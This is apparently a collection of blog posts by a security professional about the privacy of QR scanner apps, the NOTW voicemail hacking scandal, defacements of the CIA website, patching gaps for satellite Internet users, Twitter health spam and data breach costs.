• America's privacy and security enforcer - The FTC has made major moves this year in its fight against cyber crime, and if enterprises and organizations aren't careful, they may be facing a team of the agency's investigators. (SC Magazine)

As you can see, the reports that Stuxnet was indeed a U.S. government project sparked a couple of articles. It also got me talking on a podcast: Demystifying nation-state attacks and their impact

QR Code Privacy Issues and AT&T

Ouch! After saying that I thought AT&T had done a better-than-average job with its QR code scanner app for the iPhone someone pointed out that AT&T's scanner is one of a number of such apps that have privacy issues. The point was made in a comment on the ESET Threat Blog by Roger Smolski who runs this excellent website focused on QR codes.

It seems that, like me, Roger is a fan of technology but keeps a wary eye on potential downsides, like a QR code scanner that does more than the user bargained for. This definitely seems to be the case with the AT&T scanner, which let's AT&T know what you scan. I liked the AT&T scanner for installing with a preview option by default, but now dislike it because of this under-disclosed sharing of data that I consider personal (i.e. what QR codes I choose to scan).

According to Roger, confirmed by his technical code scanner analysis, some QR scanner apps, like NeoReader, are gathering data on your use of the app. The AT&T scanner is an example of this. An example of a decent scanner that does not do this is Bar Code Scanner for Android. I am going to have to look further for an iPhone QR Code scanner app that is independently confirmed as "non-tracking." In the meantime, here are other QR/privacy articles by Roger Smolski:

• Are There Privacy Issues With QR Codes?
• Four Ways You Can Scan QR Codes Safely

Oh, and BTW, FYI, it seems QR Code is a registered trademark of Denso Wave Corp. So maybe I will adopt Roger's usage of 2D codes to avoid stepping on anyone's IP toes.

AT&T Gets QR Code Scanner Right

AT&T might not be the best-loved company in America but it deserves praise for getting something right: The QR code scanner that it supplies for the Apple iPhone has a preview-and-authorize mode installed as the default. 

I have explained why this is important in this article on QR codes and NFC tags which includes a video that makes the point quite vividly: You should not let your hardware act on the instructions embedded in a QR code of NFC tag without first knowing what those actions are. The AT&T code scanner for iPhone is set up to do that. Other scanners also have that ability but do not behave that way by default.

I have bashed AT&T for poor wireless products and service on numerous occasions, but I believe in praise where praise is due. Security has long been a priority at AT&T. Over the years I have trained thousands of AT&T employees on everything from server security to security in the workplace. So I was happy to see their QR code reader was designed right.

Cybersecurity Reading List for March 2012

Cybersecurity reports, blog posts, and white papers are not in short supply these days, so I thought I would help folks decide what subset to read. I'm hoping this will make up for some of the neglect this blog has suffered over the past few months, due in no small part to my heavy--yet enjoyable--workload at ESET.

• The paper "Follow the Money" offers great insight into the spam business today. A lot of other papers worth reading are listed on the same page.
• The Trustwave Global Security Report 2012 has a lot of interesting statistics, some quite surprising: "Industries with franchise models are the new cyber targets: more than a third of 2011 investigations occurred in a franchise business."
• The Verizon 2011 Data Breach Investigation Report (pdf) is almost a year old but still worth reading is you haven't already. Good background for the 2012 report.
• Some highlights from the forthcoming Verizon 2012 DBIR, like "29% of threat incidents involved the ability to guess a user's password correctly."
• Selections from the ESET Threat Blog: 
• Drive-by FTP: a new view of CVE-2011-3544. Novel way to distribute the payload for the most common java exploit.
• OSX/Imuler updated: still a threat on Mac OS X and hiding Trojan code in erotic pictures.
• Modern viral propagation: Facebook, shocking videos, browser plugins, spreading Koobface, Boonana, Win32/Delf.QCZ, Yimfoca, and more.

Chinese hacks and Anonymous hacking: Lessons of the end game when nothing is 100% secure

I read about the hacking of the California State Law Enforcement Association or CSLEA website by Anonymous "for fun and m4yh3m!"just after reading about the latest round of hacking of Chinese websites. Nota Bene: I am NOT saying Anonymous hacked the Chinese websites; I'm NOT talking abut Chinese hacking of U.S. websites; and I'm NOT writing as an employee of any organization.

Etymologically Speaking: Cracking or hacking, mobile phones or voicemail?

In the wake of the News of The World (NOTW) scandal in which "journalists" are alleged to have listened to, and sometimes erased, messages left on phones that did not belong to said journalists, the term phone hacking has shot up the charts of widely misused phrases.

As this very helpful article on Geek News Central points out, the NOTW scandal is not really about phone hacking, it is about voicemail hacking, which the article's title tries to make clear: How To Hack Mobile Phone Voicemail.

Like the proverbial Trojan Horse, which was really neither horse nor Trojan, we are probably stuck with phone hacking as a phrase hacked together by hacks to describe some types of phone system manipulation and/or phone user duping. Such subtle distinctions may not matter to some people, but I think they matter to information security professionals. Why? Because part of our role in society, one that I personally take very seriously, is trying to bring clarity to matters involving the theft of information, unwarranted invasions of privacy through the abuse of information systems, use of computer systems to commit fraud, and so on.

And perhaps no word in recent memory has been more abused and hacked than hackers. As Steven Levy firmly established more than 25 years ago in his book, Hackers: Heroes of the Computer Revolution, the word started out with a positive connotation, a subject he addressed at the recent DefCon hacker conference in Las Vegas.

For almost as many years, my good friend Dr. Mich Kabay has tried to maintain a consistent distinction between hackers and criminal hackers. In his copious writings and teachings on information assurance, Mich diligently avoids omitting the word criminal from the phrase, either for convenience or brevity (see these Google results for examples).

(In the 1990s, some people tried to get criminal hackers shortened to crackers but that was doomed by ambiguity, between the decidedly non-technical use of the term cracker in the Southern states and people who specialize in cracking encryption codes.)

While criminal hackers are generally to be reviled for the mess they are making of otherwise beneficial technology, some hackers may be deserving of praise. You can get a personal perspective on this distinction by watching the excellent documentary made by another good friend, Ashley Schwartau, titled "Hackers Are People Too."

All of which underlines the ambiguity--some might say neutrality--of information technology, and the need to use care, as well as clear and specific language, when discussing its use or abuse. Voicemail can be incredibly useful, but it can be abused and cause pain when "hacked" by people of questionable ethics. Encryption can protect your private information from prying eyes, or allow a criminal hacker to hold your data for ransom. Cracking encryption can save lives or expose people to their enemies.

You might say that the problem with technology is the people who abuse it. We need to distinguish them from the people who try to improve it. And choosing our words wisely is one way of making that distinction.

Footnote: I will have a lot more to say about this and other aspects of information security after September 1, which is when I transition to a new position: Security Evangelist for ESET.

The NOTW Phone Hacking Scandal: Lessons for risk managers keep coming

In the context of data privacy, cyber security, and risk management I once wrote: "Failure to police your employees and sub-contractors can have serious consequences."

In the last 6 days we have seen massive proof of that as the News of the World (NOTW) phone hacking scandal has erupted onto the world stage, spewing a toxic mix of consequences, the like of which we have never seen before.

Consider anyone who owned stock in BSkB. I documented their bad news yesterday. And consider any innocent employees of the News of the World who are suddenly without a job. If those people find it hard to get new jobs because of the stigma of being ex-NOTW employees, they could argue that NOTW robbed them of their professional reputation and possibly sue NOTW and its executives on that basis.

I will admit that the possibility of getting sued for running a company in such a disreputable manner that you drag down your employees with you is not a risk that I had previously considered. But we now see that such a thing could play out as a consequence of a company hiring people to do illegal hacking, or turning a blind eye to hacking, in other words, failure to enforce ethical business practices and appropriate privacy policies. Here's what the Guardian wrote on the subject around the 1.52pm mark on their July 10 live blogging of the NOTW scandal:

Dismissed News of the World journalists who are unable to find replacement jobs and feel their professional reputations have been severely damaged could have legal grounds for suing News International, according to one employment law source. Owen Bowcott, who is the Guardian's acting legal affairs correspondent, writes about a Lords ruling that could have implications:

"There is a precedent in a 1997 House of Lords judgment that covers the predicament of two former employees of the collapsed Bank of Credit and Commerce International who claimed they suffered the "stigma" of being associated with the ex-employer that put them at a "serious disadvantage" of finding new work. "In [Malik vs BCCI] the House of Lords upheld, in principle, the right of innocent ex-employees to sue a former employer for common law damages where revelations concerning the employer's corrupt practices had damaged their prospects of future employment in the industry," one employment expert suggested. "Corruption was assumed as a hypothesis for purposes of the decision"."

Bowcott went on to say "Loss of reputation, the 1997 judgment pointed out, is "inherently difficult to prove" but it added that there is an implied mutual obligation of trust and confidence between employer and employee." The House of Lords judgment concluded. "Difficulties of proof cannot alter the legal principles which permit, in appropriate cases, such claims for financial loss caused by breach of contract being put forward for consideration."

So, there you have one more risk of bad corporate governance: Revelation of the company's corrupt practices damaging the employment prospects of your employees, leading to lawsuits. And to think it all started with a voicemail PIN number being guessed or social engineered.

Hacking Costs Billons in Stock Losses: 2.88 billion more reasons to enforce security policies

The negative impact of information security incidents on stock prices has been documented numerous times over the past ten years, but I think we are now witnessing the most dramatic hacking-related stock losses ever seen, as reported in the Guardian last Friday under the headline BSkyB shares fall £1.8bn. For American readers:

• BSkyB is British Sky Broadcasting, a satellite TV company 
• BSkyB is like DirecTV only bigger (based on Market Cap), 
• the Guardian is a very reputable British newspaper,
• one British pound is worth about $1.6,
• that share drop erased $2.88 billion from the company's value.

What information security incident at BSkyB triggered this share drop? That's a trick question! The stock dropped because of the illegal hacking of voicemail by a person or persons hired by a British newspaper, News of the World, often referred to as NOTW.

The owner of NOTW is Rupert Murdoch's News International (NASDAQ:NWS) which has been looking to buy BSkyB, pending approval by regulators, who may not be so keen to approve the deal given the mess that News International is now in as a result of the scandal surrounding the voicemail hacking. When you look at how the stock of NWS fared today you see where the term "fell off a cliff" comes from:

Bear in mind that NWS owns the Wall Street Journal, the New York Post and Fox everything, from movies to TV channels to TV stations.

So what we have here is an amazing example of how a few people committing acts of hacking on behalf of one relatively small part of a big company can cause massive damage that extends beyond the company itself, not to mention the victims of the hacking, like the parents of deceased soldiers and at least one murder victim.

And the collateral damage will roll on. People who own shares of BSkyB and NWS may sue the company executives. People laid off by the News of the World, which has been closed for good, may sue for loss of reputation by association. Victims of the hacking may sue.

All of which could have been avoided if the News of the World had adhered to privacy standards and ethical business standards. But the company allowed this to happen, over a period of years, so there can be no defense based on the existence of policies. (If you have your company network password taped to the bottom of your keyboard, in violation of company security policy, there is legal precedent for saying that is not grounds for dismissal if the company has tolerated everyone doing the same thing for some time.) 

There will be much more about this hacking-induced upheaval as the days roll on...including the huge irony of hacking closing a major British newspaper, not because of outside criminal hackers breaking in, but because of insiders illegally hacking people outside the company.

BTW, if you want the whole sordid story of this hacking debacle prior to this latest development, including police corruption and royal family secrets, this Wikipedia article is a good source. I will end with a footnote on the BSkyB share value: the amount wiped out by the end of today was $3.84 billion.

CIA Website Hack Recalls Early Days of eCommerce

Recent hacking of the CIA website brings back memories of the earliest days of eCommerce on the Web and the first wave of website hacking. The first defacing of the CIA website was carried out in September 1996. For those too young to remember, here's what it looked like:

The hacking was done by Swedish hackers using the name "Group Power Through Resistance" and their goals went beyond embarrassing the CIA. According to TechWorld Sweden:

"The attack messages were primarily intended for the then Swedish state prosecutor [Bo Skarinder] who accused members of the Swedish Hackers Association of hacking. The sentence "Stop lying Bo Skarinder!" is remembered to this day."

The most recent CIA website hack, as of this post, was the following effort by an Indian hacker who goes by “lionaneesh":

Lionaneesh claims to have gained access by exploiting an XSS or cross-site scripting vulnerability (here's a detailed explanation of XSS written by my brother Mike).

When Lionaneesh tweeted about his exploits on a Twitter account his name was listed as Aneesh Dogra (that name has since been removed, but the Twitter account is still active). Posting a "follow me" message on a hacked CIA web page is one of the more interesting ways to gain followers (of which @lionaneesh now has 206).

Via Twitter, Aneesh expressed affinity with LulzSec, the hacker group that claimed responsibility for an attack on the CIA earlier in the week.The page defaced by Mr. Dogra was taken down quite quickly, but a screenshot of it was posted on The Hacker News (as reported on GMA NEWS, the Filipino news site).

That first round of government agency website hacks in 1996 served as a wakeup call to eCommerce sites which were starting to come on line at that time (a time when I was providing consulting services to such companies, via the NCSA that later became ICSA Labs, and the Miora Systems Consulting company that later became InfoSec Labs, founded by Michael Miora, Vincent Schiavone, David Brussin, and of course me).

When I was writing my first paper on the topic of Internet Commerce, delivered at a conference in Hong Kong in early 1996, I struggled to find examples of website defacing. The one that does stick with me is a fur dealer who was targeted by animal rights activists. That sent a strong message about brand-tarnishing and activist-hacking, which became known as hacktivism. It also alerted companies to the truly global nature of the world wide web. you might write your website content for your customers, but the entire world can read it if they choose to do so.

To this day I would advise companies against publishing content on their websites that advocates an unpopular point-of-view or employs insensitive language, unless they are well-prepared to repel attacks from people who do not share that point of view. An example I used to cite was a timber industry website that was thinking of putting its newsletters online, the content of which was standard stuff within the industry, but a red flag to environmental extremists (who would be able to find it much more easily on the web than by getting a copy of the printed edition.)

A quick read of the Wikipedia page on hactivism will tell you the term is still emotion-laden because both hacking and activism remain ambiguous terms, seen as the illegal actions of bad actors by those on the receiving end, and the right thing, done for good reason, by the doers. The issue is not made any easier by the pugnacious "shoot-the-messenger" reaction of many organizations to news that their systems are vulnerable.

My wife encountered this when she questioned a suspicious network connection at a government facility containing highly sensitive classified data. She was angrily asked: "What do you think you're doing probing this network?" As a graduate of the Stephen Cobb School of Tact and Diplomacy she avoided snapping back with the obvious: "My job!" Instead, she calmly explained that her boss had asked her to create a map of the network for which he was responsible and, in doing so, she had found an undocumented connection to an insecure network. Thanks to a boss who stood by his employee [my wife] the issue was resolved, but not before the threat of prosecution was raised by the "offended" party who owned the insecure network (and who chose to remain in denial of its insecurity).

Many such stories are documented on the web and one can imagine a hacker finding a flaw in the CIA website wondering what to do about it. Tell the CIA? Who may come looking for you because they can't accept that a. their site is insecure, b. your intentions are honorable. Clearly this is a dilemma. When you exploit the vulnerability that you have found you create an example that can be used to remind governments and companies that web security is not a fix-and-forget challenge but an ongoing effort. Nevertheless, the right thing to do is NOT hack the site. And hacking it for personal glory does nothing to help your claim that you were trying to do the right thing.

Finally, it has to be said that if any federal government agency ought to be a showcase of website security best practices it is the CIA. I'm NOT saying they deserved to be hacked, but they deserve to be on the receiving end of probing questions. As do other government entities. For example, the method that Private Bradley Manning used to remove copies of classified government documents from SIPRNET, the ones that ended up on Wikileaks, was clearly a violation of policies and procedures that my wife laid down over ten years ago to address such problems. It is hard to argue that the people who chose not to enforce such policies are entirely blameless for what their actions, or inaction, allowed to transpire.

Internet Security and Satellite Internet: A gap that needs to be patched?

Today there are over a million computers in America that connect to the Internet via a satellite connection, and the number continues to grow. During this past winter I used my spare time to write a white paper on satellite Internet connectivity, mainly to drive home the point that it is no substitute for DSL/cable/fiber when it comes to broadband access for rural communities. The white paper has just been published by the Rural Mobile and Broadband Alliance (RuMBA).

However, an interesting security issue came up in the course of writing this 22-page paper and I thought I would highlight it here. If you like, you can download the full report at no charge from this link. (You can also read more about this research in this blog post.)

One of the reasons nobody should seriously consider defining satellite Internet as broadband is the daily download limit that satellite services impose, typically about 400 megabytes a day, which is less than some operating system upgrades we have seen in recent years. These capacity limits are not just a serious inconvenience, they have serious implications for computer security.

Basically, satellite Internet users have to turn off automated updating of operating systems and applications to prevent incurring costs and usage restrictions arising from bandwidth caps. However, as I am sure you know, computer and software makers increasingly rely on these automated processes to distribute the security “patches” required to prevent exploitation of computers by criminal hackers.

Computers with unpatched operating systems and applications are a prime target for hackers as these machines are more easily exploited and turned into “zombies” under the control of attackers. Zombies are then orchestrated into “botnets” that are used to attack other systems, from commercial and government websites to utility systems and entire sections of the Internet itself. The Department of Homeland Security today considers unpatched consumer computers a threat to national security and the problem has been openly discussed by cyber-security officials at the federal level since at least 2002.

Some might argue that computers on a relatively slow satellite connection (you're lucky to get above 256Kbps when uploading) are not attractive to botnet builders, But some botnet attacks don't need much speed or capacity to be effective. The fact that the IP address blocks occupied by these "at risk" systems are relatively easy to identify may also be considered an added risk factor.

Solutions are possible, like special exemptions on bandwidth caps for authorized OS and application patches, but so far I have not heard any talk of these being implemented. Since the federal government is currently handing over tens of millions of taxpayer dollars to satellite Internet service providers to help them build their subscriber base, maybe that money should come with strings, like better provision for prompt security patching.

Twitter Spam Getting Bad, Now Poisoning Health-Related Search Results

What is Twitter spam? A whole bunch of "people" tweeting the same thing from accounts that are likely automated. These bogus accounts have a human name followed by a number, like Colettaj339. When you check out the profile you see this person has:

• Sent many tweets (all pushing links), 
• Not followed anyone (Following=0). 

In other words, the account merely exists to direct clicks to a promotion in return for money. Following the pattern of previous forms of spam this Twitter-spam is growing fast and targeting vulnerable people.

For example, I have been encountering more and more of this stuff when searching Twitter for the term "hemochromatosis" which is a scary and potentially fatal genetic condition that causes iron overload, a toxic buildup of iron in joints and organs like the liver, heart, brain, thyroid and so on.

Given the pathetically poor level of knowledge about this condition that exists in the general medical population it is very common for people who find they have hemochromatosis to turn to various channels on the Internet for information, including Twitter.

My hemochromatosis search on Twitter today found a bunch of tweeted links leading to a pitch page for an eBook on Iron Overload priced at $37. Bear in mind that the highly regarded and medically reviewed Iron Disorders Institute Guide to Hemochromatosis can be purchased in paperback on Amazon.com for a lot less than half that price, and can be had as an eBook on Kindle for $9.89.

Maybe the tweet-spammed book is brilliant and worth $37 but the large number of spam Tweets makes me doubtful. And this is by no means the first targeting of hemochromatosis sufferers on Twitter. Tweet spam leading people to an article site has also used this hook. In fact, I'm willing to bet that whenever you search a nasty disease, for example multiple sclerosis, you will see this Tweet spam. Here are some observations about this depressing phenomenon:

1. Cobb's First Law of Communications Technology: Every new communications technology will quickly be abused, most likely by people lying in the hopes of making money.
2. Twitter has not done enough to make sure new accounts are opened by real people.
3. Twitter is not doing enough to remove blatant spam accounts (email me as scobb[at]scobb[dot]net for the algorithm to identify these accounts guys, it's not that complicated)
4. A depressingly large number of people need to ask themselves whether what they are doing with their computers is helping or hurting their fellow man, woman, or child.
5. Until the median level of morality among computer literate humans starts to rise, we will see spam, scams, fraud, and the like continuing to poison the technology and waste precious resources (like the energy that email spam wastes, enough to power millions of homes).

BTW, if you want solid information about hemochromatosis, visit The Iron Disorders Institute. If you want Twitter to do more to stop Twitter-spam contact the company. I find that a fax to the CEO is a good communications channel to use: Mr. Evan Williams, CEO, Twitter, Inc., 795 Folsom St., Suite 600, San Francisco, CA 94107, fax 415-222-0922.

Cost of a data breach climbs higher

Well worth paying attention, whether you are in privacy or security, in business or investing in businesses, CIPP or CISSP:

Cost of a data breach climbs higher - Dr. Ponemon's blog

"The latest U.S. Cost of a Data Breach report, which was just released today, shows that costs continue to rise. This year, they reached $214 per compromised record and averaged $7.2 million per data breach event. The fact is that individuals still care deeply about their personal information and they lose trust in companies that fail to protect it.

It’s not only direct costs of a data breach, such as notification and legal defense costs that impact the bottom line for companies, but also indirect costs like lost customer business due to abnormal churn. This year’s study showed some very interesting results. In my view, there are a few standout trends."